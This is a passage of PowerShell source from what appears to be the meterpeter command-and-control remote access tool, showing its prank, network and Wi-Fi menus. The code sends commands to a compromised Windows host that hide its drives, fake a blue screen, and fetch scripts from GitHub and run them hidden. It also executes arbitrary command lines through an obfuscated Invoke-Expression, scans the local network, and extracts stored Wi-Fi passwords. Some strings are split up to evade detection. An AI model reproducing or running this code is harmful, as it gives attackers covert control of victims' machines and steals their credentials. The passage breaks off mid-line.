Show Drives in Explorer         \"  -NoNewline;\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Pranks:NoDrives> \" -NoNewline -ForeGroundColor Green;\r\n        $choise_two = Read-Host;\r\n        If($choise_two -ieq \"Disable\" -or $choise_two -ieq \"off\")\r\n        {\r\n          write-host \" * Hide All Drives (C:D:E:F:G) From Explorer ..\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n          $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){cmd /R reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f;Get-ItemProperty -path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer' -Name 'NoDrives' | select-Object NoDrives,PSchildName,PSDrive,PSProvider | Format-Table -AutoSize `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;cmd /R taskkill /F /IM explorer.exe;start explorer.exe}else{echo `\"   [i] Client Admin Privileges Required (run as administrator)`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n        }\r\n        If($choise_two -ieq \"Enable\" -or $choise_two -ieq \"on\")\r\n        {\r\n          write-host \" * Display All Drives (C:D:E:F:G) In Explorer ..\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n          $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Remove-Itemproperty -path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer' -Name 'NoDrives' -Force;Get-Item -path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer' `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;cmd /R taskkill /F /IM explorer.exe;start 
explorer.exe}else{echo `\"   [i] Client Admin Privileges Required (run as administrator)`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n        }\r\n        If($choise_two -ieq \"Return\" -or $choise_two -ieq \"cls\" -or $choise_two -ieq \"Modules\" -or $choise_two -ieq \"clear\")\r\n        {\r\n           $Command = $Null;\r\n           $choise_two = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"CriticalError\")\r\n      {\r\n         $MaxInteractions = Read-Host \" - How many times to loop prank?  (8) \"\r\n         $DelayTime = Read-Host \" - The delay time between loops?  (9) \"\r\n\r\n         If([string]::IsNullOrEmpty($DelayTime)){$DelayTime = \"9\"}\r\n         If([string]::IsNullOrEmpty($MaxInteractions)){$MaxInteractions = \"8\"}\r\n\r\n         Write-Host \" * Faking a critical system error (BSOD)\" -ForegroundColor Green\r\n         Write-Host \"   => Takes approx. 30 seconds to run`n`n\" -ForegroundColor DarkYellow\r\n\r\n         write-host \"   > Executing BSOD prank in background.\" -ForegroundColor Green\r\n         write-host \"   > MaxInteractions:\" -NoNewline\r\n         write-host \"$MaxInteractions\" -ForegroundColor Red -NoNewline\r\n         write-host \" DelayTime:\" -NoNewline\r\n         write-host \"$DelayTime\" -ForegroundColor Red -NoNewline\r\n         write-host \" (sec)`n\"\r\n\r\n         #Execute remote command\r\n         $Command = \"powershell cd `$Env:TMP;iwr -Uri 'https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/C2Prank.ps1' -OutFile 'C2Prank.ps1'|Unblock-File;Start-Process -windowstyle hidden powershell -ArgumentList '-file C2Prank.ps1 -MaxInteractions $MaxInteractions -DelayTime $DelayTime'\"\r\n      }\r\n      If($choise -ieq \"msgbox\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module allows the attacker to spawn a simple msgbox that auto-closes\"\r\n         write-host \"   after a 
certain amount of pre-selected time, or spawn a msgbox that\"\r\n         write-host \"   waits for confirmation (press the yes button on the msgbox) to execute a cmdline\"\r\n         write-host \"   Remark: The msgbox 'auto-close time' is set in seconds\" -ForegroundColor Yellow\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  -------------------\";\r\n         write-host \"   simple   Spawn simple msgbox          UserLand\";\r\n         write-host \"   cmdline  msgbox that exec cmdline     UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Pranks:Msgbox> \" -NoNewline -ForeGroundColor Green;\r\n         $msgbox_choise = Read-Host;\r\n         If($msgbox_choise -ieq \"Simple\")\r\n         {\r\n            Write-Host \" * Spawn simple remote msgbox\" -ForegroundColor Green\r\n            $MsgBoxClose = Read-Host \" - Msgbox auto-close time\"\r\n            If(-not($MsgBoxClose) -or $MsgBoxClose -ieq $null)\r\n            {\r\n               $MsgBoxClose = \"10\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$MsgBoxClose'\" -ForegroundColor Red\r\n            }\r\n\r\n            $MsgBoxTitle = Read-Host \" - Input the msgbox title\"\r\n            If(-not($MsgBoxTitle) -or $MsgBoxTitle -ieq $null)\r\n            {\r\n               $MsgBoxTitle = \"MeterpeterC2\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$MsgBoxTitle'\" -ForegroundColor Red\r\n            }\r\n\r\n            $MsgBoxText = Read-Host \" - Input text to display \"\r\n            If(-not($MsgBoxText) -or $MsgBoxText -ieq $null)\r\n            {\r\n               $MsgBoxText = \"Executing message box ..\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$MsgBoxText'\" -ForegroundColor Red\r\n            }\r\n\r\n    
        Write-Host \"`n`n   > Executing simple messagebox remote ..`n\"\r\n            $Command = \"powershell (New-Object -ComObject Wscript.Shell).Popup(`\"$MsgBoxText`\",$MsgBoxClose,`\"$MsgBoxTitle`\",4+64)|Out-Null\"\r\n         }\r\n         If($msgbox_choise -ieq \"cmdline\")\r\n         {\r\n            $MsgBoxClose = Read-Host \" - Msgbox auto-close time\"\r\n            If(-not($MsgBoxClose) -or $MsgBoxClose -ieq $null)\r\n            {\r\n               $MsgBoxClose = \"10\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$MsgBoxClose'\" -ForegroundColor Red\r\n            }\r\n\r\n            $MsgBoxTitle = Read-Host \" - Input the msgbox title\"\r\n            If(-not($MsgBoxTitle) -or $MsgBoxTitle -ieq $null)\r\n            {\r\n               $MsgBoxTitle = \"MeterpeterC2\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$MsgBoxTitle'\" -ForegroundColor Red\r\n            }\r\n\r\n            $MsgBoxText = Read-Host \" - Input text to display \"\r\n            If(-not($MsgBoxText) -or $MsgBoxText -ieq $null)\r\n            {\r\n               $MsgBoxText = \"Executing command\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$MsgBoxText'\" -ForegroundColor Red\r\n            }\r\n\r\n            $MsgBoxAppli = Read-Host \" - PS Cmdline to execute \"\r\n            If(-not($MsgBoxAppli) -or $MsgBoxAppli -ieq $null)\r\n            {\r\n               $MsgBoxAppli = \"cmd /R start calc.exe\"\r\n               Write-Host \"   => Error: wrong input, set demo to '$MsgBoxAppli'\" -ForegroundColor Red\r\n            }\r\n\r\n            Write-Host \" * Spawn msgbox that exec cmdline\" -ForegroundColor Green\r\n            $Command = \"[int]`$MymsgBox = powershell (New-Object -ComObject Wscript.Shell).Popup(`\"$MsgBoxText`\",$MsgBoxClose,`\"$MsgBoxTitle`\",4+64);If(`$MymsgBox -eq 6){echo `\"$MsgBoxAppli`\"|&('Sex' -replace 'S','I');echo `\"`n   `> Command '$MsgBoxAppli' executed.`\"|Out-File 
msglogfile.log}Else{echo `\"`n   `> Failed to execute '$MsgBoxAppli' command.`\"|Out-File msglogfile.log};Get-Content -Path msglogfile.log;Remove-Item -Path msglogfile.log -Force\"\r\n         }\r\n         If($msgbox_choise -ieq \"Return\" -or $msgbox_choise -ieq \"cls\" -or $msgbox_choise -ieq \"modules\" -or $msgbox_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $msgbox_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"Speak\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   This module makes the remote host speak one sentence.\"\r\n        write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                     -------------------\"\r\n        write-host \"   start     speak input sentence            UserLand\";\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Pranks:Speak> \" -NoNewline -ForeGroundColor Green;\r\n        $Speak_choise = Read-Host;\r\n        If($Speak_choise -ieq \"start\")\r\n        {\r\n           write-host \" - Input Phrase for Remote-Host to Speak: \" -NoNewline;\r\n           $MYSpeak = Read-Host;\r\n           write-host \" * Executing speak prank.\" -ForegroundColor Green\r\n           If(-not ($MYSpeak -ieq $False -or $MYSpeak -eq \"\"))\r\n           {\r\n             write-host \"\"\r\n             $Mytype = \"Ad\" + \"d-Ty\" + \"pe \" + \"-Assembl\" + \"yName\" -join ''\r\n             $Command = \"`$My_Line = `\"$MYSpeak`\";$Mytype System.speech;`$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer;`$speak.Volume = 85;`$speak.Rate = -2;`$speak.Speak(`$My_Line);echo `\"   `> Speak Phrase: '$MYSpeak' ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n           }\r\n        
   Else\r\n           {\r\n             write-host \"\";\r\n             $MYSpeak = \"Next time don't forget to input the text ok?\";\r\n             $Mytype = \"Ad\" + \"d-Ty\" + \"pe \" + \"-Assembl\" + \"yName\" -join ''\r\n             $Command = \"`$My_Line = `\"$MYSpeak`\";$Mytype System.speech;`$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer;`$speak.Volume = 85;`$speak.Rate = -2;`$speak.Speak(`$My_Line);echo `\"   `> Speak Phrase: '$MYSpeak' ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n           }\r\n        }\r\n        If($Speak_choise -ieq \"Return\" -or $Speak_choise -ieq \"cls\" -or $Speak_choise -ieq \"Modules\" -or $Speak_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $Speak_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"OpenUrl\" -or $choise -ieq \"URL\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module allows users to open a URL link in the default web browser.\"\r\n         write-host \"   It opens the browser, or a new tab if the browser is already up.\"\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  -------------------\"\r\n         write-host \"   Open     Url on default browser       UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Pranks:Url> \" -NoNewline -ForeGroundColor Green;\r\n         $url_choise = Read-Host;\r\n         If($url_choise -ieq \"Open\")\r\n         {\r\n            $UrlLink = Read-Host \" - Input URL to open\"\r\n            If(-not($UrlLink) -or $UrlLink -ieq $null)\r\n            {\r\n               $UrlLink = \"https://mrdoob.com/projects/chromeexperiments/google-gravity\"\r\n               
Write-Host \"   => Error: wrong input, set demo to '$UrlLink'\" -ForegroundColor Red\r\n            }\r\n            \r\n            write-host \"\"\r\n            $Command = \"Start-Process -WindowStyle Maximized `\"$UrlLink`\"|Out-Null;If(`$? -eq `\"True`\"){echo `\"   `> Successfully opened URL: $UrlLink`\"|Out-File defbrowser.meterpeter;Start-Sleep -Seconds 1;Get-Content -Path defbrowser.meterpeter;Remove-Item -Path defbrowser.meterpeter -Force}Else{echo `\"   `> Failed to open URL: $UrlLink`\"|Out-File defbrowser.meterpeter;Get-Content -Path defbrowser.meterpeter;Remove-Item -Path defbrowser.meterpeter -Force}\" \r\n            $UrlLink = $null\r\n         }\r\n         If($url_choise -ieq \"Return\" -or $url_choise -ieq \"cls\" -or $url_choise -ieq \"modules\" -or $url_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $url_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"GoogleX\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   Opens the default web browser on the selected easter egg,\";\r\n        write-host \"   or opens a new tab if the browser is already open.\";\r\n        write-host \"`n`n   Modules     Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------     -----------                     -------------------\"\r\n        write-host \"   gravity     Open Google-Gravity             UserLand\";\r\n        write-host \"   sphere      Open Google-Sphere              UserLand\";\r\n        write-host \"   rotate      Rotate webpage 360º             UserLand\";\r\n        write-host \"   mirror      Open Google-Mirror              UserLand\";\r\n        write-host \"   teapot      Open Google-teapot              UserLand\";\r\n        write-host \"   invaders    Open Invaders-Game              UserLand\";\r\n        write-host \"   pacman      Open Pacman-Game   
             UserLand\";\r\n        write-host \"   rush        Open Google-Zerg-Rush           UserLand\";\r\n        write-host \"   moon        Open Google-Moon                UserLand\";\r\n        write-host \"   terminal    Open Google-terminal            UserLand\";\r\n        write-host \"   trexgame    Open Google-tRexgame            UserLand\";\r\n        write-host \"   googlespace Open google-space               UserLand\";\r\n        write-host \"   kidscoding  Open Google-kidscoding          UserLand\";\r\n        write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Pranks:GoogleX> \" -NoNewline -ForeGroundColor Green;\r\n        $EasterEgg = Read-Host;\r\n        If($EasterEgg -ieq \"terminal\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://elgoog.im/terminal\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"trexgame\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://elgoog.im/t-rex\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"kidscoding\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://www.google.com/logos/2017/logo17/logo17.html\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"googlespace\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://mrdoob.com/projects/chromeexperiments/google-space/\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> 
prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"teapot\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://www.google.com/teapot\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"sphere\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://mrdoob.com/projects/chromeexperiments/google-sphere\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"gravity\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://mrdoob.com/projects/chromeexperiments/google-gravity\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"rotate\")\r\n        {\r\n           write-host \" - Execute it how many times? : \" -NoNewline;\r\n           $LoopRange = Read-Host;\r\n           If(-not($LoopRange) -or $LoopRange -eq $null)\r\n           {\r\n              $LoopRange = \"1\"\r\n           }\r\n\r\n           If($LoopRange -gt 1)\r\n           {\r\n\r\n              write-host \" - Secs before the next loop? 
: \" -NoNewline;\r\n              $LoopDelay = Read-Host;\r\n              If(-not($LoopDelay) -or $LoopDelay -eq $null)\r\n              {\r\n                 $LoopDelay = \"20\"\r\n              }\r\n           }\r\n           Else\r\n           {\r\n              $LoopDelay = \"5\"\r\n           }\r\n\r\n           write-host \"`n\";\r\n           $cmdline = \"https://www.google.com/search?q=do+a+barrel+roll\"\r\n           $Command = \"cd `$Env:TMP;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Misc-CmdLets/Prank2.ps1`\" -OutFile `\"`$Env:TMP\\Prank2.ps1`\"|Unblock-File;Start-Process -WindowStyle Hidden powershell -ArgumentList `\"powershell -File `$Env:TMP\\Prank2.ps1 -StartDelay '3' -LoopRange $LoopRange -LoopDelay $LoopDelay`\";echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"rush\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://elgoog.im/zergrush/\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"moon\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://www.google.com/moon/\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"mirror\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://elgoog.im/google-mirror/\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"pacman\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://elgoog.im/pacman/\"\r\n           $Command = 
\"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($EasterEgg -ieq \"invaders\")\r\n        {\r\n           write-host \"`n\";\r\n           $cmdline = \"https://elgoog.im/space-invaders/\"\r\n           $Command = \"cmd /R start /max $cmdline;echo `\"   `> Open: '$cmdline'`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }        \r\n        If($EasterEgg -ieq \"Return\" -or $EasterEgg -ieq \"cls\" -or $EasterEgg -ieq \"Modules\" -or $EasterEgg -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n        }\r\n        $EasterEgg = $Null;\r\n      }\r\n      If($choise -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"modules\")\r\n      {\r\n        $Command = $Null;\r\n      }\r\n      $choise = $Null;\r\n      $Clear = $True;\r\n    }\r\n\r\n    If($Command -iMatch '^(Net|NetScanner)$')\r\n    {\r\n      write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n      write-host \"   Remote network manager\";\r\n      write-host \"`n`n   Modules     Description\" -ForegroundColor green;\r\n      write-host \"   -------     -----------\";\r\n      write-host \"   ListDNS     List remote host Domain Name entrys\";\r\n      write-host \"   TCPinfo     List remote host TCP\\UDP connections\";\r\n      write-host \"   ListWifi    List remote host Profiles/SSID/Passwords\";\r\n      write-host \"   PingScan    List devices ip addr\\ports\\dnsnames on Lan\";\r\n      write-host \"   GeoLocate   List Client GeoLocation curl \\ ifconfig.me\";\r\n      write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow\r\n      write-host \"`n`n :meterpeter:Net> \" -NoNewline -ForeGroundColor Green;\r\n      $choise = Read-Host;\r\n      If($choise -ieq \"ListDNS\" -or $choise -ieq \"dns\")\r\n      {\r\n        write-host \" * Remote host DNS entrys.`n\" -ForegroundColor 
Green;Start-Sleep -Seconds 1\r\n        $Command = \"Get-DnsClientCache|Select-Object Entry,Name,DataLength,Data|Format-Table -AutoSize > dns.txt;`$TestData = Get-Content dns.txt;If([string]::IsNullOrEmpty(`$TestData)){echo `\"   `> No remote DNS cache entries found!`\" `> dns.txt};Get-Content dns.txt;remove-item dns.txt -Force\";\r\n      }\r\n      If($choise -ieq \"TCPinfo\" -or $choise -ieq \"TCP\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module enumerates ESTABLISHED TCP\\UDP connections,\"\r\n         write-host \"   DNS cache, IP addresses, hostnames and the TCP routing table\"\r\n         write-host \"`n`n   Modules  Description                    Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                    -------------------\";\r\n         write-host \"   Stats    Query IPv4 Statistics          UserLand\";\r\n         write-host \"   Query    Established TCP connections    UserLand\";\r\n         write-host \"   Verbose  Query TCP\\UDP\\DNS\\ARP cache    UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Net:Tcp> \" -NoNewline -ForeGroundColor Green;\r\n         $ConManager_choise = Read-Host;\r\n         If($ConManager_choise -ieq \"Stats\")\r\n         {\r\n            write-host \" * Enumerating TCP statistics.\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetConnections.ps1`\" -OutFile `\"`$Env:TMP\\GetConnections.ps1`\"|Out-Null;powershell -W 1 -file `$Env:TMP\\GetConnections.ps1 -Action Stats;Start-Sleep -Seconds 1;Remove-Item -Path `$Env:TMP\\GetConnections.ps1 -Force\"         \r\n         }\r\n         If($ConManager_choise -ieq \"Query\")\r\n         {\r\n            write-host \" * Established TCP connections.`n\" -ForegroundColor Green\r\n           
 $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetConnections.ps1`\" -OutFile `\"`$Env:TMP\\GetConnections.ps1`\"|Out-Null;powershell -W 1 -file `$Env:TMP\\GetConnections.ps1 -Action Enum;Start-Sleep -Seconds 1;Remove-Item -Path `$Env:TMP\\GetConnections.ps1 -Force\"\r\n         }\r\n         If($ConManager_choise -ieq \"Verbose\")\r\n         {\r\n            write-host \" * Established TCP\\UDP connections.`n\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetConnections.ps1`\" -OutFile `\"`$Env:TMP\\GetConnections.ps1`\"|Out-Null;powershell -W 1 -file `$Env:TMP\\GetConnections.ps1 -Action Verbose;Start-Sleep -Seconds 1;Remove-Item -Path `$Env:TMP\\GetConnections.ps1 -Force\"\r\n         }\r\n         If($ConManager_choise -ieq \"Return\" -or $ConManager_choise -ieq \"cls\" -or $ConManager_choise -ieq \"Modules\" -or $ConManager_choise -ieq \"clear\")\r\n         {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $ConManager_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"ListWifi\" -or $choise -ieq \"wifi\")\r\n      {\r\n        write-host \"`n`n   Remark:\" -ForegroundColor Yellow\r\n        write-host \"   Use single quotes if profile contains empty spaces.\"\r\n        write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                     -------------------\";\r\n        write-host \"   ListProf  Remote-Host wifi Profile        UserLand\";\r\n        write-host \"   ListNetw  List wifi Available networks    UserLand\";\r\n        write-host \"   ListSSID  List Remote-Host SSID Entrys    UserLand\";\r\n        write-host \"   SSIDPass  Extract Stored SSID passwords   UserLand\";\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host 
\"`n`n :meterpeter:Net:Wifi> \" -NoNewline -ForeGroundColor Green;\r\n        $wifi_choise = Read-Host;\r\n        If($wifi_choise -ieq \"ListProf\" -or $wifi_choise -ieq \"prof\")\r\n        {\r\n          write-host \" * Remote-Host Profile Statistics.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n          $Command = \"cmd /R Netsh WLAN show interface `> pro.txt;`$check_tasks = Get-content pro.txt;If(-not (`$check_tasks)){echo `\"   [i] meterpeter Failed to retrieve wifi profile ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;Remove-Item pro.txt -Force}else{Get-Content pro.txt;Remove-Item pro.txt -Force}\";          \r\n        }\r\n        If($wifi_choise -ieq \"ListNetw\" -or $wifi_choise -ieq \"netw\")\r\n        {\r\n          write-host \" * List Available wifi Networks.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n          $Command = \"cmd /R Netsh wlan show networks `> pro.txt;`$check_tasks = Get-content pro.txt;If(-not (`$check_tasks)){echo `\"   [i] None networks list found in: $Remote_Host`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;Remove-Item pro.txt -Force}else{Get-Content pro.txt;Remove-Item pro.txt -Force}\";          \r\n        }\r\n        If($wifi_choise -ieq \"ListSSID\" -or $wifi_choise -ieq \"ssid\")\r\n        {\r\n          write-host \" * List of Remote-Host SSID profiles.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n          $Command = \"cmd /R Netsh WLAN show profiles `> ssid.txt;`$check_tasks = Get-content ssid.txt;If(-not (`$check_tasks)){echo `\"   [i] None SSID profile found in: $Remote_Host`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;Remove-Item ssid.txt -Force}else{Get-Content ssid.txt;Remove-Item ssid.txt -Force}\";\r\n        }\r\n        If($wifi_choise -ieq \"SSIDPass\" -or $wifi_choise -ieq \"pass\")\r\n        {\r\n          write-host \" - Sellect WIFI Profile: \" -ForegroundColor Red -NoNewline;\r\n          $profile = 
Read-Host;\r\n          If(-not ($profile) -or $profile -eq \" \")\r\n          {\r\n            write-host \"  => Error: No profile name provided ..\" -ForegroundColor red -BackGroundColor white;\r\n            write-host \"  => Usage: meterpeter> Net -> ListWifi -> ListSSID (to list profiles).\" -ForegroundColor red -BackGroundColor white;write-host \"`n`n\";\r\n            Start-Sleep -Seconds 4;\r\n            $Command = $Null;\r\n            $profile = $Null;\r\n          }else{\r\n            write-host \" * Extracting SSID Password.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n            $Command = \"cmd /R netsh wlan show profile $profile Key=Clear `> key.txt;Get-Content key.txt;Remove-Item key.txt -Force\"\r\n          }\r\n          $profile = $Null;\r\n        }\r\n        If($wifi_choise -ieq \"Return\" -or $wifi_choise -ieq \"cls\" -or $wifi_choise -ieq \"Modules\" -or $wifi_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n        }\r\n        $choise = $Null;\r\n        $wifi_choise = $Null;\r\n      }\r\n      If($choise -ieq \"PingScan\" -or $choise -ieq \"Ping\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n         write-host \"   Module to scan the local LAN for active IP addresses,\";\r\n         write-host \"   or for open ports when the 'portscan' module is selected.\";\r\n         write-host \"   Remark: a maxports portscan takes approx. 4 minutes.\" -ForeGroundColor yellow\r\n         write-host \"`n`n   Modules   Description                            Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------   -----------                            ------------------\";\r\n         write-host \"   Enum      List active ip addresses on local Lan  UserLand\";\r\n         write-host \"   PortScan  Single ip port scanner \\ dns resolver  UserLand\";\r\n         
write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n         write-host \"`n`n :meterpeter:Net:Ping> \" -NoNewline -ForeGroundColor Green;\r\n         $ping_choise = Read-Host;\r\n         If($ping_choise -ieq \"Enum\")\r\n         {\r\n            Write-Host \" - Ip addr range to scan (1,255): \" -ForegroundColor Red -NoNewline\r\n            $IpRange = Read-Host;\r\n            $TimeOut = \"300\" #Faster discovery mode\r\n            If(-not($IpRange) -or $IpRange -NotMatch ',')\r\n            {\r\n               $IpRange = \"1,255\"\r\n               Write-Host \"   => Error: invalid ip range, defaulting to '$IpRange' ..\" -ForegroundColor Red\r\n               Write-Host \" * Remark: a full scan takes approx. 2 minutes to finish.\"  -ForegroundColor Yellow\r\n            }\r\n\r\n            #Execute command remotely\r\n            Write-Host \" * Scanning Lan for active devices!\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/PingSweep.ps1`\" -OutFile `\"`$Env:TMP\\PingSweep.ps1`\"|Out-Null;powershell -File `$Env:TMP\\PingSweep.ps1 -Action Enum -IpRange `\"$IpRange`\" -TimeOut `\"$TimeOut`\" -Egg True;Remove-Item -Path `$Env:TMP\\PingSweep.ps1 -Force\"\r\n         }\r\n         If($ping_choise -ieq \"PortScan\")\r\n         {\r\n            Write-Host \" - Input ip address to scan ($Local_Host) : \" -ForegroundColor Red -NoNewline\r\n            $IpRange = Read-Host;\r\n            #Accept only a dotted-quad IPv4 address (the old pattern rejected short octets such as 10.0.0.1)\r\n            If($IpRange -NotMatch '^(\\d{1,3}\\.){3}\\d{1,3}$')\r\n            {\r\n               $IpRange = \"$Local_Host\"\r\n               Write-Host \"   => Error: invalid ip address, 